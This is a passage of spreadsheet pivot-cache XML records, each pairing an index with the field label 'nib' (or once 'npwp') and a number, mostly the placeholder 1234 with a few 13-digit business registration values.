  </r>
  <r>
    <x v="2378"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2379"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2380"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2381"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2382"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2383"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2384"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2385"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2386"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2387"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2388"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2389"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2390"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2391"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2392"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2393"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2394"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2395"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2396"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2397"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2398"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2399"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2400"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2401"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2402"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2403"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2404"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2405"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2406"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2407"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2408"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2409"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2410"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2411"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2412"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2413"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2414"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2415"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2416"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2417"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2418"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2419"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2420"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2421"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2422"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2423"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2424"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2425"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2426"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2427"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2428"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2429"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2430"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2431"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2432"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2433"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2434"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2435"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2436"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2437"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2438"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2439"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2440"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2441"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2442"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2443"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2444"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2445"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2446"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2447"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2448"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2449"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2450"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2451"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2452"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2453"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2454"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2455"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2456"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2457"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2458"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2459"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2460"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2461"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2462"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2463"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2464"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2465"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2466"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2467"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2468"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2469"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2470"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2471"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2472"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2473"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2474"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2475"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2476"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2477"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2478"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2479"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2480"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2481"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2482"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2483"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2484"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2485"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2486"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2487"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2488"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2489"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2490"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2491"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2492"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2493"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2494"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2495"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2496"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2497"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2498"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2499"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2500"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2501"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2502"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2503"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2504"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2505"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2506"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2507"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2508"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2509"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2510"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2511"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2512"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2513"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2514"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2515"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2516"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2517"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2518"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2519"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2520"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2521"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2522"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2523"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2524"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2525"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2526"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2527"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2528"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2529"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2530"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2531"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2532"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2533"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2534"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2535"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2536"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2537"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2538"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2539"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2540"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2541"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2542"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2543"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2544"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2545"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2546"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2547"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2548"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2549"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2550"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2551"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2552"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2553"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2554"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2555"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2556"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2557"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2558"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2559"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2560"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2561"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2562"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2563"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2564"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2565"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2566"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2567"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2568"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2569"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2570"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2571"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2572"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2573"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2574"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2575"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2576"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2577"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2578"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2579"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2580"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2581"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2582"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2583"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2584"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2585"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2586"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2587"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2588"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2589"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2590"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2591"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2592"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2593"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2594"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2595"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2596"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2597"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2598"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2599"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2600"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2601"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2602"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2603"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2604"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2605"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2606"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2607"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2608"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2609"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2610"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2611"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2612"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2613"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2614"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2615"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2616"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2617"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2618"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2619"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2620"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2621"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2622"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2623"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2624"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2625"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2626"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2627"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2628"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2629"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2630"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2631"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2632"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2633"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2634"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2635"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2636"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2637"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2638"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2639"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2640"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2641"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2642"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2643"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2644"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2645"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2646"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2647"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2648"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2649"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="546"/>
    <s v="nib"/>
    <n v="9120002900753"/>
  </r>
  <r>
    <x v="2650"/>
    <s v="nib"/>
    <n v="9120002220599"/>
  </r>
  <r>
    <x v="2651"/>
    <s v="nib"/>
    <n v="8120001891266"/>
  </r>
  <r>
    <x v="686"/>
    <s v="nib"/>
    <n v="8120001801049"/>
  </r>
  <r>
    <x v="2652"/>
    <s v="nib"/>
    <n v="9120001513414"/>
  </r>
  <r>
    <x v="2274"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2653"/>
    <s v="nib"/>
    <n v="9120213011276"/>
  </r>
  <r>
    <x v="2654"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2655"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2656"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2657"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2658"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2659"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2660"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2661"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2662"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2663"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2664"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2665"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2666"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2667"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2668"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2669"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2670"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2671"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2672"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2673"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2674"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2675"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2676"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2677"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2678"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2679"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2680"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2681"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2682"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2683"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2684"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2685"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2686"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2687"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2688"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2689"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2690"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2691"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2692"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2693"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2694"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2695"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2696"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2697"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2698"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2699"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2700"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2701"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2702"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2703"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2704"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2705"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2706"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2707"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2708"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2709"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2710"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2711"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2712"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2713"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2714"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2715"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2716"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2717"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2718"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2719"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2720"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2721"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2722"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2723"/>
